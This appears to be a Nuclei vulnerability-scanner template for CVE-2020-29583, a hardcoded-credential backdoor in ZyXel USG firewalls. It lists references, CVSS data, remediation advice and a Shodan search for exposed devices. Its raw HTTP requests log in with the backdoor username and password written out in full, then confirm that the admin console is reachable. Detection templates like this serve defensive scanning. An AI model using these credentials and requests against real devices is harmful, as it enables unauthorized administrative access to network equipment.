59 lines
2.0 KiB
YAML
59 lines
2.0 KiB
YAML
id: CVE-2020-29583
|
|
|
|
info:
|
|
name: ZyXel USG - Hardcoded Credentials
|
|
author: canberbamber
|
|
severity: critical
|
|
description: |
|
|
A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP.
|
|
remediation: |
|
|
Update the firmware of the ZyXel USG device to the latest version, which addresses the hardcoded credentials issue.
|
|
reference:
|
|
- https://www.zyxel.com/support/CVE-2020-29583.shtml
|
|
- https://support.zyxel.eu/hc/en-us/articles/360018524720-Zyxel-security-advisory-for-hardcoded-credential-vulnerability-CVE-2020-29583
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-29583
|
|
- https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html
|
|
- http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2020-29583
|
|
cwe-id: CWE-522
|
|
epss-score: 0.96219
|
|
epss-percentile: 0.99378
|
|
cpe: cpe:2.3:o:zyxel:usg20-vpn_firmware:4.60:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: zyxel
|
|
product: usg20-vpn_firmware
|
|
shodan-query: title:"USG FLEX 100"
|
|
tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
GET /ext-js/index.html HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
cookie-reuse: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body_2
|
|
words:
|
|
- 'data-qtip="Web Console'
|
|
- 'CLI'
|
|
- 'Configuration"></a>'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100975b4575e555f6825f222420a46e69e5ac02d92ae14968e250746bed5de8ea4c022100ed71fe588d109dc744c262790e1a7823b5997b7e840206cc711d244a88efa5a7:922c64590222798bb761d5b6d8e72950
|